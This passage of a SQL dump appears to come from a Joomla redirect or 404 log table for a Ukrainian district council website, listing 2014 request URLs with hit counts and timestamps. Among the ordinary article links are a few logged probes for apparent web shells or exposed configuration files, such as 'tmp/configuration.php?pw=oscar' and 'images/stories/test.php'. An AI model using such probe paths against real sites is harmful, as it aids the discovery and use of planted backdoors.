00:00:00',301),(4481,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1337:2014-06-10-11-11-42&tmpl=component&print=1&layout=default&page=&lang=uk','','','',4,0,'2014-09-24 10:23:53','0000-00-00 00:00:00',301),(4482,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1066:-23-&catid=11&lang=ru','','','',3,0,'2014-09-24 10:31:33','0000-00-00 00:00:00',301),(4483,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1066:-23-&catid=11&lang=ru','','','',2,0,'2014-09-24 10:32:06','0000-00-00 00:00:00',301),(4484,'http://www.malyn-rayrada.org.ua/images/nyet.htm','','','',5,0,'2014-09-24 10:32:05','0000-00-00 00:00:00',301),(4485,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1258:2014-03-31-06-18-35&catid=11&Itemid=14&lang=en','','','',6,0,'2014-09-24 10:32:36','0000-00-00 00:00:00',301),(4486,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1038:2013-06-28-10-19-47&catid=11&lang=en&Itemid=','','','',1,0,'2014-09-24 10:32:38','0000-00-00 00:00:00',301),(4487,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1270:2014-04-08-13-49-40&catid=11&lang=ru','','','',4,0,'2014-09-24 10:53:00','0000-00-00 00:00:00',301),(4488,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1066:-23-&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-24 10:53:20','0000-00-00 00:00:00',301),(4489,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1074:2013-09-02-05-02-30&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-24 10:53:34','0000-00-00 00:00:00',301),(4490,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1270:2014-04-08-13-49-40&catid=11&lang=ru','','','',2,0,'2014-09-24 10:56:24','0000-00-00 00:00:00',301),(4491,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1066:-23-&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-24 11:00:40','0000-00-00 00:00:00',301),(4492,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1066:-23-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-24 11:06:03','0000-00-00 00:00:00',301),(4493,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1270:2014-04-08-13-49-40&catid=11&lang=uk&Itemid=','','','',1,0,'2014-09-24 11:12:17','0000-00-00 00:00:00',301),(4494,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1066:-23-&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-24 11:15:14','0000-00-00 00:00:00',301),(4495,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1270:2014-04-08-13-49-40&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-09-24 11:21:17','0000-00-00 00:00:00',301),(4496,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1270:2014-04-08-13-49-40&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-09-24 11:49:34','0000-00-00 00:00:00',301),(4497,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=986:-20---&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-09-24 11:53:22','0000-00-00 00:00:00',301),(4498,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1352:2014-06-26-06-51-20&catid=11&lang=uk','','','',6,0,'2014-09-24 11:57:36','0000-00-00 00:00:00',301),(4499,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1318:-3110&catid=59:--20062014-&Itemid=107&lang=uk','','','',10,0,'2014-09-24 12:03:55','0000-00-00 00:00:00',301),(4500,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:----------2013-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',2,0,'2014-09-24 12:07:38','0000-00-00 00:00:00',301),(4501,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1268:-l-r&catid=57&Itemid=98&lang=en','','','',9,0,'2014-09-24 12:08:05','0000-00-00 00:00:00',301),(4502,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1225:2014-02-24-13-27-21&catid=11&lang=uk','','','',4,0,'2014-09-24 12:09:55','0000-00-00 00:00:00',301),(4503,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1236:2014-03-07-06-36-44&catid=11&lang=uk','','','',9,0,'2014-09-24 12:14:59','0000-00-00 00:00:00',301),(4504,'http://malyn-rayrada.org.ua/tmp/configuration.php?pw=oscar','','','',1,0,'2014-09-24 12:20:09','0000-00-00 00:00:00',301),(4505,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1068:-22-&catid=15&lang=en&Itemid=','','','',7,0,'2014-09-24 12:29:05','0000-00-00 00:00:00',301),(4506,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1225:2014-02-24-13-27-21&catid=11&lang=uk&Itemid=','','','',3,0,'2014-09-24 12:29:20','0000-00-00 00:00:00',301),(4507,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1371:2014-08-04-19-11-42&catid=11&Itemid=14&lang=en','','','',7,0,'2014-09-24 12:29:59','0000-00-00 00:00:00',301),(4508,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1256:2014-03-27-17-22-43&catid=11&lang=uk','','','',6,0,'2014-09-24 12:38:47','0000-00-00 00:00:00',301),(4509,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1264:2014-04-01-11-27-13&catid=11&lang=uk','','','',6,0,'2014-09-24 12:41:13','0000-00-00 00:00:00',301),(4510,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1225:2014-02-24-13-27-21&catid=11&lang=uk&Itemid=0','','','',4,0,'2014-09-24 12:46:55','0000-00-00 00:00:00',301),(4511,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1130:2013-11-07-14-04-12&catid=11&lang=uk&Itemid=','','','',6,0,'2014-09-24 12:55:50','0000-00-00 00:00:00',301),(4512,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1225:2014-02-24-13-27-21&catid=11&lang=uk&Itemid=','','','',3,0,'2014-09-24 13:17:29','0000-00-00 00:00:00',301),(4513,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1311:-69-1941-1945-&catid=11&lang=en&Itemid=','','','',3,0,'2014-09-24 13:27:49','0000-00-00 00:00:00',301),(4514,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1155:2013-12-07-15-56-12&catid=11&lang=en','','','',5,0,'2014-09-24 13:27:53','0000-00-00 00:00:00',301),(4515,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1311:-69-1941-1945-&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-24 13:30:22','0000-00-00 00:00:00',301),(4516,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1261:2014-03-31-11-35-31&catid=10&Itemid=17&lang=uk','','','',6,0,'2014-09-24 13:31:51','0000-00-00 00:00:00',301),(4517,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1074:2013-09-02-05-02-30&catid=11&lang=ru','','','',3,0,'2014-09-24 13:33:11','0000-00-00 00:00:00',301),(4518,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1261:2014-03-31-11-35-31&catid=10&Itemid=17&lang=uk','','','',4,0,'2014-09-24 13:35:17','0000-00-00 00:00:00',301),(4519,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1293:-2014-&catid=58&Itemid=105&lang=uk','','','',10,0,'2014-09-24 13:35:19','0000-00-00 00:00:00',301),(4520,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1292:-i-&catid=11&Itemid=14&lang=ru','','','',16,0,'2014-09-24 13:35:50','0000-00-00 00:00:00',301),(4521,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1074:2013-09-02-05-02-30&catid=11&lang=uk','','','',2,0,'2014-09-24 13:36:01','0000-00-00 00:00:00',301),(4522,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1071:2013-08-27-14-06-18&catid=11&lang=ru','','','',2,0,'2014-09-24 13:37:07','0000-00-00 00:00:00',301),(4523,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1243:2014-03-17-07-32-47&catid=57&Itemid=98&lang=en','','','',28,0,'2014-09-24 13:37:27','0000-00-00 00:00:00',301),(4524,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1311:-69-1941-1945-&catid=11&lang=en&Itemid=0','','','',7,0,'2014-09-24 13:39:19','0000-00-00 00:00:00',301),(4525,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1071:2013-08-27-14-06-18&catid=11&lang=uk','','','',2,0,'2014-09-24 13:40:02','0000-00-00 00:00:00',301),(4526,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1266:2014-04-03-05-25-14&catid=11&Itemid=14&lang=en','','','',15,0,'2014-09-24 13:40:56','0000-00-00 00:00:00',301),(4527,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1294:-2012-2015-&catid=58:--30042014-&Itemid=105&lang=uk','','','',11,0,'2014-09-24 13:46:24','0000-00-00 00:00:00',301),(4528,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1319:-2014-&catid=59&Itemid=107&lang=en','','','',7,0,'2014-09-24 13:46:30','0000-00-00 00:00:00',301),(4529,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1336:2014-06-10-11-01-06&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',11,0,'2014-09-24 13:46:41','0000-00-00 00:00:00',301),(4530,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1326:-100-547&catid=11&lang=en&Itemid=','','','',7,0,'2014-09-24 13:49:22','0000-00-00 00:00:00',301),(4531,'http://malyn-rayrada.org.ua/images/stories/test.php?rf','','','',1,0,'2014-09-24 13:56:56','0000-00-00 00:00:00',301),(4532,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1261:2014-03-31-11-35-31&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',7,0,'2014-09-24 14:03:39','0000-00-00 00:00:00',301),(4533,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1147:2013-11-28-09-57-12&catid=11&lang=en&Itemid=','','','',5,0,'2014-09-24 14:04:23','0000-00-00 00:00:00',301),(4534,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1074:2013-09-02-05-02-30&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-24 14:05:51','0000-00-00 00:00:00',301),(4535,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1074:2013-09-02-05-02-30&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-24 14:05:56','0000-00-00 00:00:00',301),(4536,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1261:2014-03-31-11-35-31&catid=10&Itemid=17&lang=ru','','','',4,0,'2014-09-24 14:07:33','0000-00-00 00:00:00',301),(4537,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1292:-i-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-24 14:08:32','0000-00-00 00:00:00',301),(4538,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1349:-31-&catid=11&lang=uk','','','',8,0,'2014-09-24 14:10:50','0000-00-00 00:00:00',301),(4539,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=7:2010-06-05-12-53-35&layout=blog&Itemid=12&lang=ru','','','',8,0,'2014-09-24 14:19:29','0000-00-00 00:00:00',301),(4540,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1074:2013-09-02-05-02-30&catid=11&lang=uk&Itemid=','','','',1,0,'2014-09-24 14:22:15','0000-00-00 00:00:00',301),(4541,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1074:2013-09-02-05-02-30&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-24 14:25:59','0000-00-00 00:00:00',301),(4542,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1261:2014-03-31-11-35-31&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',13,0,'2014-09-24 14:38:31','0000-00-00 00:00:00',301),(4543,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1074:2013-09-02-05-02-30&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-24 14:43:30','0000-00-00 00:00:00',301),(4544,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1261:2014-03-31-11-35-31&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',8,0,'2014-09-24 14:59:21','0000-00-00 00:00:00',301),(4545,'http://www.malyn-rayrada.org.ua/undefined/','','','',79,0,'2014-09-24 15:13:24','0000-00-00 00:00:00',301),(4546,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=844:------------2013--&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',2,0,'2014-09-24 15:20:24','0000-00-00 00:00:00',301),(4547,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=844:-2013-&catid=46&Itemid=85&lang=en','','','',3,0,'2014-09-24 15:20:32','0000-00-00 00:00:00',301),(4548,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1099:------------------l-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',3,0,'2014-09-24 15:23:30','0000-00-00 00:00:00',301),(4549,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1297:2014-04-24-09-20-07&catid=10&Itemid=17&lang=en','','','',6,0,'2014-09-24 15:24:16','0000-00-00 00:00:00',301),(4550,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1193:-2014-2015-&catid=36&Itemid=70&lang=uk','','','',2,0,'2014-09-24 15:25:15','0000-00-00 00:00:00',301),(4551,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1038:2013-06-28-10-19-47&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-09-24 15:40:02','0000-00-00 00:00:00',301),(4552,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1261:2014-03-31-11-35-31&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',5,0,'2014-09-24 15:42:37','0000-00-00 00:00:00',301),(4553,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=844:-2013-&catid=46:--21122012&Itemid=85&lang=en','','','',11,0,'2014-09-24 15:49:04','0000-00-00 00:00:00',301),(4554,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1104:-lr&catid=53:--25102013-&Itemid=94&lang=ru','','','',5,0,'2014-09-24 16:01:34','0000-00-00 00:00:00',301),(4555,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1104:-lr&catid=53:--25102013-&Itemid=94&lang=uk','','','',5,0,'2014-09-24 16:01:39','0000-00-00 00:00:00',301),(4556,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=971:-2012-&catid=36&Itemid=70&lang=uk','','','',4,0,'2014-09-24 16:08:56','0000-00-00 00:00:00',301),(4557,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1104:-lr&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',5,0,'2014-09-24 16:30:08','0000-00-00 00:00:00',301),(4558,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=844:-2013-&catid=46:--21122012&Itemid=85&lang=en','','','',3,0,'2014-09-24 16:33:17','0000-00-00 00:00:00',301),(4559,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1104:------------------lr&catid=36&Itemid=70&lang=uk','','','',3,0,'2014-09-24 16:40:20','0000-00-00 00:00:00',301),(4560,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1104:------------------lr&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',6,0,'2014-09-24 16:53:48','0000-00-00 00:00:00',301),(4561,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=2&Itemid=32&lang=ru','','','',4,0,'2014-09-24 16:54:27','0000-00-00 00:00:00',301),(4562,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1170:2014-01-08-11-02-06&catid=11&lang=en&Itemid=','','','',1,0,'2014-09-24 16:58:25','0000-00-00 00:00:00',301),(4563,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1104:-lr&catid=36&Itemid=70&lang=uk','','','',3,0,'2014-09-24 16:58:27','0000-00-00 00:00:00',301),(4564,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1104:-lr&catid=53:--25102013-&Itemid=94&lang=ru','','','',2,0,'2014-09-24 16:58:38','0000-00-00 00:00:00',301),(4565,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=939:-18-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-24 17:00:43','0000-00-00 00:00:00',301),(4566,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1104:-lr&catid=53:--25102013-&Itemid=94&lang=uk','','','',2,0,'2014-09-24 17:05:50','0000-00-00 00:00:00',301),(4567,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1261:2014-03-31-11-35-31&catid=10&Itemid=17&lang=ru','','','',4,0,'2014-09-24 17:09:24','0000-00-00 00:00:00',301),(4568,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1170:2014-01-08-11-02-06&catid=11&lang=en&Itemid=','','','',1,0,'2014-09-24 17:14:53','0000-00-00 00:00:00',301),(4569,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1104:-lr&catid=53&Itemid=94&lang=ru','','','',1,0,'2014-09-24 17:20:57','0000-00-00 00:00:00',301),(4570,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1104:-lr&catid=36&Itemid=70&lang=ru','','','',2,0,'2014-09-24 17:29:49','0000-00-00 00:00:00',301),(4571,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1170:2014-01-08-11-02-06&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-24 17:30:12','0000-00-00 00:00:00',301),(4572,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=904:-2012-2013-&catid=47:-21022013-&Itemid=86&lang=ru','','','',2,0,'2014-09-24 17:44:52','0000-00-00 00:00:00',301),(4573,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-09-24 17:50:59','0000-00-00 00:00:00',301),(4574,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1104:------------------lr&catid=36&Itemid=70&lang=ru','','','',3,0,'2014-09-24 17:51:50','0000-00-00 00:00:00',301),(4575,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&catid=11&Itemid=14&lang=ru','','','',14,0,'2014-09-24 18:19:10','0000-00-00 00:00:00',301),(4576,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&catid=11&lang=en&Itemid=','','','',7,0,'2014-09-24 18:27:52','0000-00-00 00:00:00',301),(4577,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-24 19:07:13','0000-00-00 00:00:00',301),(4578,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1299:-lr-&catid=58:--30042014-&Itemid=105&lang=en','','','',3,0,'2014-09-24 19:12:24','0000-00-00 00:00:00',301),(4579,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=10&lang=ru','','','',14,0,'2014-09-24 19:20:27','0000-00-00 00:00:00',301),(4580,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1305:-30----&catid=11&lang=en&Itemid=','','','',6,0,'2014-09-24 19:22:35','0000-00-00 00:00:00',301),(4581,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=942:-19-6-&catid=11&lang=ru','','','',7,0,'2014-09-24 19:24:45','0000-00-00 00:00:00',301),(4582,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1125:2013-10-31-07-20-16&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',7,0,'2014-09-24 19:42:48','0000-00-00 00:00:00',301),(4583,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2014-01-06-08-19-15&catid=11&lang=en','','','',4,0,'2014-09-24 19:43:43','0000-00-00 00:00:00',301),(4584,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2014-01-06-08-19-15&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-09-24 19:46:41','0000-00-00 00:00:00',301),(4585,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1249:2014-03-24-06-41-46&catid=57&Itemid=98&lang=ru','','','',4,0,'2014-09-24 19:46:46','0000-00-00 00:00:00',301),(4586,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1046:-2013-&catid=11&lang=ru&Itemid=','','','',4,0,'2014-09-24 19:47:00','0000-00-00 00:00:00',301),(4587,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1173:2014-01-15-10-37-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-24 19:47:01','0000-00-00 00:00:00',301),(4588,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1072:-24-6-&catid=11&lang=uk','','','',7,0,'2014-09-24 19:48:45','0000-00-00 00:00:00',301),(4589,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1127:2013-11-05-12-58-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-09-24 19:55:17','0000-00-00 00:00:00',301),(4590,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1046:-2013-&catid=11&lang=ru','','','',2,0,'2014-09-24 20:02:48','0000-00-00 00:00:00',301),(4591,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1046:-2013-&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-24 20:03:38','0000-00-00 00:00:00',301),(4592,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1163:2013-12-20-07-44-35&catid=15&lang=uk','','','',17,0,'2014-09-24 20:03:59','0000-00-00 00:00:00',301),(4593,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1331:2014-06-04-07-15-27&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',5,0,'2014-09-24 20:12:43','0000-00-00 00:00:00',301),(4594,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1026:2013-06-14-05-02-34&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',4,0,'2014-09-24 20:14:41','0000-00-00 00:00:00',301),(4595,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1049:2013-07-15-05-50-46&catid=11&Itemid=14&lang=uk','','','',11,0,'2014-09-24 20:41:07','0000-00-00 00:00:00',301),(4596,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1060:2013-07-27-10-13-15&catid=11&Itemid=14&lang=en','','','',7,0,'2014-09-24 20:54:06','0000-00-00 00:00:00',301),(4597,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1046:-2013-&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-24 20:59:24','0000-00-00 00:00:00',301),(4598,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1019:2013-06-06-11-26-38&catid=51:--19072013-&Itemid=92&lang=uk','','','',9,0,'2014-09-24 21:48:32','0000-00-00 00:00:00',301),(4599,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1061:2013-07-29-08-58-16&catid=11&lang=uk','','','',2,0,'2014-09-24 22:13:45','0000-00-00 00:00:00',301),(4600,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&catid=11&Itemid=14&lang=en','','','',1,0,'2014-09-24 22:19:30','0000-00-00 00:00:00',301),(4601,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1061:2013-07-29-08-58-16&catid=11&lang=ru&Itemid=','','','',3,0,'2014-09-24 22:29:55','0000-00-00 00:00:00',301),(4602,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1061:2013-07-29-08-58-16&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-24 22:46:01','0000-00-00 00:00:00',301),(4603,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1213:2014-02-14-13-53-12&catid=11&lang=en','','','',4,0,'2014-09-24 22:51:14','0000-00-00 00:00:00',301),(4604,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1196:2014-01-30-14-12-50&catid=11&lang=en','','','',4,0,'2014-09-24 22:51:38','0000-00-00 00:00:00',301),(4605,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=939:-18-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-24 22:51:50','0000-00-00 00:00:00',301),(4606,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1218:2014-02-21-15-02-18&catid=11&lang=en','','','',4,0,'2014-09-24 22:52:25','0000-00-00 00:00:00',301),(4607,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1237:-200-&catid=11&lang=en','','','',5,0,'2014-09-24 22:52:49','0000-00-00 00:00:00',301),(4608,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1156:2013-12-09-07-12-03&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',17,0,'2014-09-24 23:02:42','0000-00-00 00:00:00',301),(4609,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1096:2013-09-24-13-34-16&catid=36&Itemid=70&lang=en','','','',3,0,'2014-09-24 23:12:42','0000-00-00 00:00:00',301),(4610,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1061:2013-07-29-08-58-16&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-24 23:14:43','0000-00-00 00:00:00',301),(4611,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1061:2013-07-29-08-58-16&catid=11&lang=ru','','','',2,0,'2014-09-24 23:30:38','0000-00-00 00:00:00',301),(4612,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1110:-9-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-09-24 23:31:30','0000-00-00 00:00:00',301),(4613,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1095:2013-09-24-13-25-55&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-09-24 23:47:11','0000-00-00 00:00:00',301),(4614,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1061:2013-07-29-08-58-16&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-24 23:59:23','0000-00-00 00:00:00',301),(4615,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1315:-31-6-&catid=11&lang=uk&Itemid=','','','',7,0,'2014-09-25 00:06:16','0000-00-00 00:00:00',301),(4616,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1061:2013-07-29-08-58-16&catid=11&lang=uk&Itemid=','','','',1,0,'2014-09-25 00:14:51','0000-00-00 00:00:00',301),(4617,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1061:2013-07-29-08-58-16&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-25 00:17:18','0000-00-00 00:00:00',301),(4618,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1061:2013-07-29-08-58-16&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-25 00:23:59','0000-00-00 00:00:00',301),(4619,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=995:-2012-&catid=11&lang=uk&Itemid=','','','',5,0,'2014-09-25 01:41:49','0000-00-00 00:00:00',301),(4620,'http://www.malyn-rayrada.org.ua/images/stories/pageinfo.php','','','',7,0,'2014-09-25 02:58:31','0000-00-00 00:00:00',301),(4621,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1325:2014-05-29-06-00-31&catid=11&lang=uk','','','',2,0,'2014-09-25 03:14:35','0000-00-00 00:00:00',301),(4622,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1321:-lr-&catid=59:--20062014-&Itemid=107&lang=en','','','',11,0,'2014-09-25 03:15:52','0000-00-00 00:00:00',301),(4623,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1372:2014-08-04-19-26-16&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-25 03:56:19','0000-00-00 